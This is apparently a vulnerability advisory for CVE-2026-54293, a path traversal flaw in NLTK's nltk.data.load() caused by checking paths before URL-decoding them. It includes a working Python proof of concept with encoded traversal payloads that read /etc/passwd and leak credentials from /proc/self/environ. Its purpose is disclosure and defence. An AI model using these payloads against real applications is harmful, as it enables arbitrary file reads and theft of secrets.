PT-2026-49738 · Pypi · Nltk
Published
2026-06-16
·
Updated
2026-06-16
·
CVE-2026-54293
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Summary
nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem.
While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.
Affected Component
nltk/data.py — find(), normalize resource url(), and the UNSAFE NO PROTOCOL RE regex check.
Relevant occurrences:
data.py L650–L653 — final path constructed from url2pathname(resource name) after checks
data.py L54–L69 — UNSAFE NO PROTOCOL RE operates only on the undecoded string
data.py L219–L245 — normalize resource url() for nltk: scheme contributes to decode-after-check
data.py L615–L618 — defense-in-depth traversal check also operates on undecoded input
Root Cause
The regex UNSAFE NO PROTOCOL RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.
Proof of Concept
"""
NLTK Arbitrary File Read via URL-Encoded Path Traversal
=======================================================
Bypasses UNSAFE NO PROTOCOL RE security regex in nltk/data.py
by URL-encoding path separators and traversal components.
Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration)
CWE: CWE-22 (Path Traversal)
Root Cause:
nltk/data.py:find() checks resource names against a regex for
traversal patterns (../, leading /, etc.) BEFORE calling
url2pathname() which decodes %xx sequences. This is a classic
"decode-after-check" vulnerability.
"""
import sys
import os
import warnings
# Suppress NLTK security warnings for clean PoC output
warnings.filterwarnings("ignore", category=RuntimeWarning)
# Setup
sys.path.insert(0, os.path.join(os.path.dirname( file ), "nltk"))
os.makedirs(os.path.expanduser("~/nltk data/corpora"), exist ok=True)
import nltk
from nltk.pathsec import ENFORCE
BANNER = """
===================================================
NLTK URL-Encoded Path Traversal PoC
Affected: nltk <= 3.9.4
Default ENFORCE={enforce}
===================================================
""".format(enforce=ENFORCE)
def test variant(name, payload, fmt="raw"):
"""Test a single traversal variant."""
try:
content = nltk.data.load(payload, format=fmt)
if isinstance(content, bytes):
preview = content[:200].decode("utf-8", errors="replace")
else:
preview = content[:200]
first line = preview.split("
")[0]
print(f" [VULN] {name}")
print(f" Payload: {payload}")
print(f" Read OK: {first line}")
return True
except Exception as e:
print(f" [SAFE] {name}")
print(f" Payload: {payload}")
print(f" Blocked: {type(e). name }: {e}")
return False
def main():
print(BANNER)
vulns = 0
# --- Variant 1: URL-encoded absolute path ---
print("[1] URL-encoded absolute path (%2f = /)")
if test variant(
"Encoded leading slash bypasses ^/ regex check",
"nltk:%2fetc%2fpasswd",
):
vulns += 1
print()
# --- Variant 2: Encoded dot-dot traversal ---
print("[2] URL-encoded dot-dot traversal (%2e = .)")
if test variant(
"Encoded dots bypass ../ regex check",
"nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
):
vulns += 1
print()
# --- Variant 3: Literal dots with encoded slash ---
print("[3] Literal dots with encoded slash (..%2f)")
if test variant(
"Encoded slash after literal .. bypasses ../ regex",
"nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
):
vulns += 1
print()
# --- Variant 4: Read process environment (credential leak) ---
print("[4] Read /proc/self/environ (credential leakage)")
try:
content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw")
env vars = content.decode("utf-8", errors="replace").split("x00")
print(f" [VULN] Leaked {len(env vars)} environment variables")
for var in env vars[:3]:
if var:
key = var.split("=")[0] if "=" in var else var
print(f" {key}=...")
vulns += 1
except Exception as e:
print(f" [SAFE] Blocked: {e}")
print()
# --- Control: verify normal traversal IS blocked ---
print("[CONTROL] Verify literal ../ is blocked by regex")
test variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd")
print()
print("=" * 51)
print(f" Result: {vulns} bypass variant(s) succeeded")
if vulns > 0:
print(" Status: VULNERABLE (url2pathname decodes after regex check)")
else:
print(" Status: Not vulnerable")
print("=" * 51)
if name == " main ":
main()Impact
Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:
/etc/passwd, /etc/shadow (if readable)
/proc/self/environ — leaks environment variables, often containing API keys, DB credentials, cloud secrets
Application source code and configuration files
Cloud metadata, deployment secrets, SSH keys
This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.
Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Nltk